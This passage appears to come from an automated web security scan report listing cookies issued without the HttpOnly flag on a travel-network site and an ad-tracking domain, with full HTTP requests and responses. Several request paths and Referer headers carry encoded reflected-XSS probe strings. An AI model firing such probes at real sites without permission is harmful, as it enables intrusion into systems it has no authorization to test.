Path:   /home/products_services/product_index/images/loadingAnimation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: exp_last_activity (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/products_services/product_index/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/product_index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621522; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.4.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621531; expires=Tue, 02-Oct-2012 00:58:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:56 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

14.285. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/products_services/travel_agency/contracts/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621621; expires=Tue, 02-Oct-2012 01:00:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

14.286. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/images/loadingAnimation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: exp_last_activity (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/products_services/travel_agency/contracts/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621619; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.7.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621625; expires=Tue, 02-Oct-2012 01:00:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:26 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

14.287. http://www.sabretravelnetwork.com/home/search/show_results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/search/show_results

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621489; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621500; expires=Tue, 02-Oct-2012 00:58:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:21 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

14.288. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621490; expires=Tue, 02-Oct-2012 00:58:10 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:10 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

14.289. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621580; expires=Tue, 02-Oct-2012 00:59:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

14.290. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621533; expires=Tue, 02-Oct-2012 00:58:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:53 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

14.291. http://www.sabretravelnetwork.com/images/home-text.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: exp_last_activity and exp_tracker (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/home-text.png HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618474; expires=Tue, 02-Oct-2012 00:07:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:55 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

14.292. http://www.wtp101.com/f

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /f

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: tuuid (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f?c=675&e=1 HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; synclock=t; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:03:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:22 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

14.293. http://www.wtp101.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: tuuid and s (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1762 HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!2445!1731; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:58:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 01 Oct 2013 23:58:07 GMT; domain=.wtp101.com
Set-Cookie: s=!1762!2445!1731; path=/; expires=Tue, 01 Oct 2013 23:58:07 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

14.294. http://www.wtp101.com/pull_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: tuuid (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=openx HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!2445!1731; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:54:23 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://r.openx.net/set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=f9bdca69-e609-4297-9145-48ea56a0756c
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 01 Oct 2013 23:54:23 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive


14.295. http://www.wtp101.com/push_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /push_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: tuuid (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /push_sync HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
